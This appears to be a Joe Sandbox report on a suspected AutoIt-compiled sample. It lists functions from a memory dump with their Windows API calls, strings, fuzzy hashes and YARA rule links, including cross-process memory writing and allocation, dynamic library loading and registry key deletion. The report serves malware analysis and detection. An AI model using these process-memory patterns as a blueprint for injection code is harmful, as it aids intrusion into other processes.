Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 1b85f1af9162f92e75665757dc6e4bb2ebf31da140db40033c44d15e9fbdd087
Instruction ID: 30346b8d1808d6517b9ab045c0aa82bf8094c2d0f98fb59ec6fd7797e541052f
Opcode Fuzzy Hash: 1b85f1af9162f92e75665757dc6e4bb2ebf31da140db40033c44d15e9fbdd087
Instruction Fuzzy Hash: 07F06275640305AFEB212FA5EC88E673BACFF4A7A4B000115F989C6140CB6A9D46EB60

Function 00FEC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00FEC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00FEC20E
MessageBeep.USER32(00000000), ref: 00FEC226
KillTimer.USER32(?,0000040A), ref: 00FEC242
EndDialog.USER32(?,00000001), ref: 00FEC25C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: db59edb9a23887861f21715e8b63c9a562bf7e467a113c23556ff968f28abd28
Instruction ID: b607f41fa8ff826ae115e78440605d8d5278b4b055bf1ced5aa83f7a30c5b84b
Opcode Fuzzy Hash: db59edb9a23887861f21715e8b63c9a562bf7e467a113c23556ff968f28abd28
Instruction Fuzzy Hash: 01012630804704ABEB305B60EC4EF9277B8FF04B02F000659F6C2A00E4CBF96848AB80

Function 00F913B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00F913BF
StrokeAndFillPath.GDI32(?,?,00FCB888,00000000,?), ref: 00F913DB
SelectObject.GDI32(?,00000000), ref: 00F913EE
DeleteObject.GDI32 ref: 00F91401
StrokePath.GDI32(?), ref: 00F9141C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: c7800124189484da339fd1838c6d81d2e3dcf2dfd492c18bb9615bc40a44bccc
Instruction ID: f279cb140a2c2e189289faeb24f1f61e3677be23d0386495713ece91af3fd0e7
Opcode Fuzzy Hash: c7800124189484da339fd1838c6d81d2e3dcf2dfd492c18bb9615bc40a44bccc
Instruction Fuzzy Hash: B6F0CD3000470A9BEF329F5AEC4C7693BA4B711326F188224F4AA591F8C73E4595DF50

Function 00FFC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00FFC432
CoCreateInstance.OLE32(01022D6C,00000000,00000001,01022BDC,?), ref: 00FFC44A

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

CoUninitialize.OLE32 ref: 00FFC6B7

Strings

.lnk, xrefs: 00FFC3C6, 00FFC3EE, 00FFC3F8

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 7d56e2b6a194bd1a50952d85b4b8a375ff8455e9e051fedf79d7a0e7dd563276
Instruction ID: 7ac144d5a96edbc3f48f9b6235d17f15d34b00fdfb151bd9e4fefb9ebc6921fd
Opcode Fuzzy Hash: 7d56e2b6a194bd1a50952d85b4b8a375ff8455e9e051fedf79d7a0e7dd563276
Instruction Fuzzy Hash: 89A14A71108305AFE700EF64CC91EABB7E8EF95354F00491DF1959B1A2EBB5EA09CB52

Function 00FA2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00FB0DB6: std::exception::exception.LIBCMT ref: 00FB0DEC
Part of subcall function 00FB0DB6: __CxxThrowException@8.LIBCMT ref: 00FB0E01

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00F97A51: _memmove.LIBCMT ref: 00F97AAB

__swprintf.LIBCMT ref: 00FA2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FA2D66

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: f85d520e65fef68b20ef8aa835cf8f5d02c9d602ada888437b64974038ba52ce
Instruction ID: 26c5652563a646f70c79f71628ca54d7d68943a4b06d84e14a2e78bed596e2bb
Opcode Fuzzy Hash: f85d520e65fef68b20ef8aa835cf8f5d02c9d602ada888437b64974038ba52ce
Instruction Fuzzy Hash: 0C915C716183019FDB14EF28CC85D6FB7A9EF86720F04491EF4459B2A1EA28ED44EB52

Function 00FFB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00F94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F94743,?,?,00F937AE,?), ref: 00F94770

CoInitialize.OLE32(00000000), ref: 00FFB9BB
CoCreateInstance.OLE32(01022D6C,00000000,00000001,01022BDC,?), ref: 00FFB9D4
CoUninitialize.OLE32 ref: 00FFB9F1

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

Strings

.lnk, xrefs: 00FFB99D, 00FFB9AB

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 3769f265704a314e4343e6b5a5b5f43405be3b59376f15a4fb6c46aa3a8fbf0c
Instruction ID: 50144960c52d0bc0d9ca21530df43f71bbfedfca275065c7f3294b3b3c328a1b
Opcode Fuzzy Hash: 3769f265704a314e4343e6b5a5b5f43405be3b59376f15a4fb6c46aa3a8fbf0c
Instruction Fuzzy Hash: C0A143756043059FDB00EF14C884D2ABBE5BF89324F05898CF9999B3A2CB35EC45DB91

Function 00FB501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00FB50AD

Part of subcall function 00FC00F0: __87except.LIBCMT ref: 00FC012B

Strings

pow, xrefs: 00FB5085, 00FB50A2

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 29651584e2382272a19fc9cb383e548793ff8c5f94573ec458a3bcc00aaee473
Instruction ID: f497d003c88b553b0978bfda70aec35d0c37b03be51d92908eb98e1af8a81413
Opcode Fuzzy Hash: 29651584e2382272a19fc9cb383e548793ff8c5f94573ec458a3bcc00aaee473
Instruction Fuzzy Hash: 98517C71D08603C7DB217A29CA06BEE7B949B40B60F348D5CE4D586299DE3D8DC5BF82

Function 00FA6192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FA6248
_memmove.LIBCMT ref: 00FA62E4
_memset.LIBCMT ref: 00FA6308

Strings

ERCP, xrefs: 00FA61B3

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 66e7ebaff52cb296f7bc4b87b921c96c3dae80a7a1fddf426ba5ee4502d2ee18
Instruction ID: 5cdc74c2bd5bf5e74f92d550f720b8a8b0462165ddc03bfed9be04d693155c3c
Opcode Fuzzy Hash: 66e7ebaff52cb296f7bc4b87b921c96c3dae80a7a1fddf426ba5ee4502d2ee18
Instruction Fuzzy Hash: AE518EB1900305DBDB24DF65C881BAAB7E4EF49324F24457EE48ACB241EB74AA45EB50

Function 00FE97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FF14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FE9296,?,?,00000034,00000800,?,00000034), ref: 00FF14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FE983F

Part of subcall function 00FF1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FE92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00FF14B1

Part of subcall function 00FF13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00FF1409
Part of subcall function 00FF13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FE925A,00000034,?,?,00001004,00000000,00000000), ref: 00FF1419
Part of subcall function 00FF13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FE925A,00000034,?,?,00001004,00000000,00000000), ref: 00FF142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FE98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FE98F9

Strings

@, xrefs: 00FE9911

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 9182247d102a705fd69d4d03421416e765dda1037c817ca9b2cd67af2b189c37
Instruction ID: 5e1045f1ed42228030d2f1bad78b207e7dc980a239c70610d3e5353ed9a3f45d
Opcode Fuzzy Hash: 9182247d102a705fd69d4d03421416e765dda1037c817ca9b2cd67af2b189c37
Instruction Fuzzy Hash: CA41507690021CAFCB20DFA4CC41AEEBBB8EF49310F004059FA45B7151DA756E45DBA0

Function 01017946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0101F910,00000000,?,?,?,?), ref: 010179DF
GetWindowLongW.USER32 ref: 010179FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 01017A0C

Strings

SysTreeView32, xrefs: 010179B1

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: d46a4efe342c9bd6336e863fae408e5dcf203ea3241ff0f579c1969f461428f4
Instruction ID: 0f1bd3959649493f7ddc78733c1b38c573a8992b4e7398187f3cad85920b2bd2
Opcode Fuzzy Hash: d46a4efe342c9bd6336e863fae408e5dcf203ea3241ff0f579c1969f461428f4
Instruction Fuzzy Hash: 7C310132200206ABEF518E78CC41BEB7BA9FB48334F244725F9B5931E4D739E9548B50

Function 010173D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01017461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 01017475
SendMessageW.USER32(?,00001002,00000000,?), ref: 01017499

Strings

SysMonthCal32, xrefs: 0101742C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 591e43544074f70f9ce3cfa18af8f54a854ceb1674cca0bca869b7cd1c3264f7
Instruction ID: d8240b7b61ea3d9b950a26ba9ce4046166d7e8db6f7816faef3b89655eefb098
Opcode Fuzzy Hash: 591e43544074f70f9ce3cfa18af8f54a854ceb1674cca0bca869b7cd1c3264f7
Instruction Fuzzy Hash: 8A21D332540219ABDF22CE64CC42FEA3BB9FF48724F110154FE956B194DB79A851DBE0

Function 01017B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01017C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01017C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01017C5F

Strings

msctls_updown32, xrefs: 01017BC4

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: b96a159432d4ed506a5d7c7097214abf67198bad5d2311f279351a6b111d102a
Instruction ID: b3fa9e434498607cbf9e101507737e52c62504050ce2ef0e5bebc2da33e3d1c9
Opcode Fuzzy Hash: b96a159432d4ed506a5d7c7097214abf67198bad5d2311f279351a6b111d102a
Instruction Fuzzy Hash: 0B214CB5600209AFEB11DF28DCC1DB737ECEB49394B140459FA859B355CB3AEC118BA0

Function 01016CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01016D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01016D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01016D70

Strings

Listbox, xrefs: 01016D08

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 49e744a99969598e3a7460a3f3df519e58c30317adaf3b2ea7a1ba4c0f851d50
Instruction ID: cc57626dc92f4b5024e523fe99183013a726a72081618a5f8096e44c98b843c5
Opcode Fuzzy Hash: 49e744a99969598e3a7460a3f3df519e58c30317adaf3b2ea7a1ba4c0f851d50
Instruction Fuzzy Hash: A6210732600118BFDF128F58DC40FBB3BBAFF89750F418128F9859B194C6BA9C5187A0

Function 0101770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 01017772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01017787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01017794

Strings

msctls_trackbar32, xrefs: 01017749

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: c84f46b4d70a27d38525529d17ee46b7476d98368be5803473148351643ea816
Instruction ID: ec49b166257afa527bcfa4e61417ec1237775483aaf7e7c41ff6e4466c44c7b2
Opcode Fuzzy Hash: c84f46b4d70a27d38525529d17ee46b7476d98368be5803473148351643ea816
Instruction Fuzzy Hash: 1411E372240209BBEF209F65CC45FEB7BA9FF88B64F014528FA81A6090D676E411CB20

Function 00F94C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F94B83,?), ref: 00F94C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F94C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00F94C50
kernel32.dll, xrefs: 00F94C3F

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 925eefd4ad7f5c53398b630d742b8d7e4d4ff69f4d9c666424aef7589fb7c216
Instruction ID: d0f4e345907dcfffc4397ca30b1effc8902641feeded87fd63359c82193d3d63
Opcode Fuzzy Hash: 925eefd4ad7f5c53398b630d742b8d7e4d4ff69f4d9c666424aef7589fb7c216
Instruction Fuzzy Hash: D5D01270915713CFDB205F32D95861676D4AF16251B11883D94E5DA214E679D884C750

Function 01010DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,01011039), ref: 01010DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01010E07

Strings

RegDeleteKeyExW, xrefs: 01010E01
advapi32.dll, xrefs: 01010DF0

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: a18971c225a8004385d67298e13e4c82289b2096af808fc7071abf6eb8bffe53
Instruction ID: abcb7c7d5ae3d183d9d0a0f2fe0cdfc4c168045c02d50535c467151e423fd992
Opcode Fuzzy Hash: a18971c225a8004385d67298e13e4c82289b2096af808fc7071abf6eb8bffe53
Instruction Fuzzy Hash: EDD017B0610723CFD7209F7AC8486877AE5AF09256F218C7EA5C6D6108E6B9E4D0CB90

Function 00F94C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F94BD0,?,00F94DEF,?,010552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F94C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F94C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00F94C1D
kernel32.dll, xrefs: 00F94C0C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: bcfb65b94e091c88c6b5c8aebaebd5ffe07a7ea28d62b73e620a8418c0dcd852
Instruction ID: 9ee634088a8be7701e2a311bde0cb41ac9b56403f08e4f554bbca7d66e4e35cd
Opcode Fuzzy Hash: bcfb65b94e091c88c6b5c8aebaebd5ffe07a7ea28d62b73e620a8418c0dcd852
Instruction Fuzzy Hash: 80D01270911713CFDB205F71D968606B6D5EF19252B118C3D94C5D6214E6B8D885CB50

Function 010090E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,01008CF4,?,0101F910), ref: 010090EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01009100

Strings

GetModuleHandleExW, xrefs: 010090FA
kernel32.dll, xrefs: 010090E9

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
